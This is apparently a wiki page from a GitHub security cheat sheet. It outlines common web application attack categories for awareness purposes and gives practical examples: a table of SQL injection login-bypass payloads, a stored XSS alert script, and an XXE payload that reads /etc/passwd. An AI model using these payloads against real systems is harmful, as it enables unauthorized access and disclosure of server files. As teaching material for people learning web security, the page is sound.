web applications attacks - dvanmosselbeen/security-cheat-sheet GitHub Wiki
- Description
-
Types of Attacks
- Attacks based on directories
- Injections & inclusions
- Information exposure
- Authentication, sessions & cookies
- Data verification & purification
- Sniffing
- Buffer overflow & Denial of service (DoS)
- Practical SQLInject Tricks
- Resources
This article deals with common web attacks and aims at making people aware of these attacks in order that they better code their applications. Each of these attacks is going to be explained, theoretically and practically and a way to patch your applications is also given.
Source: https://www.aldeid.com/wiki/Web-applications-attacks
- Path disclosure
- Directory traversal
- Directory listening
- Predictable files and directories
- .htaccess vulnerabilities
- XXE
- Cross Site Scripting (XSS)
- Stored XSS
- Cross Site Request Forgery (CSRF or XSRF)
- Cross Site Tracing (XST)
- Local File Inclusion (LFI)
- Remote File Inclusion (RFI)
- SQL Injection
- Command Injection
- Server Side Includes (SSI)
- HTML comments inspection
- Display errors]]
- Exceptions exploitation
- Configuration weaknesses
- .htaccess vulnerabilities
- Authentication brute-force
- Predictable sessions & session hijacking
- Weak encryption
- Cookie injection / cookie poisoning
- Client-Side vs server-side verifications
- Client Side data
- Data purification
- HTTP splitting
###Sniffing
- Intercept data over the network
- Buffer overflow
- Denial of Service (DoS)
- Concurrency
Source: https://sechow.com/bricks/docs/login-1.html
| User name | Password | SQL Query |
|---|---|---|
tom |
tom |
SELECT * FROM users WHERE name='tom' and password='tom' |
tom |
' or '1'='1 |
SELECT * FROM users WHERE name='tom' and password='' or '1'='1' |
tom |
' or 1='1 |
SELECT * FROM users WHERE name='tom' and password='' or 1='1' |
tom |
1' or 1=1 -- - |
SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -' |
' or '1'='1 |
' or '1'='1 |
SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1' |
' or ' 1=1 |
' or ' 1=1 |
SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1' |
1' or 1=1 -- - |
blah |
SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah' |
A nice playground on TryHackMe: https://tryhackme.com/room/xss
A script that is stored into the database. Each user visiting the website will execute the script.
<script>alert("Warning!!!")</script>Display whatever data we want to display. In this example it will print out falcon feast.
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>Display the content of a file on the system. In this example the /etc/passwd file on a Linux system.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>- OWASP Top 10 Application Security Risks
- CWE/SANS TOP 25 Most Dangerous Software Errors
- Mitre - 2021 CWE Top 25 Most Dangerous Software Weaknesses
-
[STRIDE]and[DREAD] - PayloadAllThinkgs - LFI examples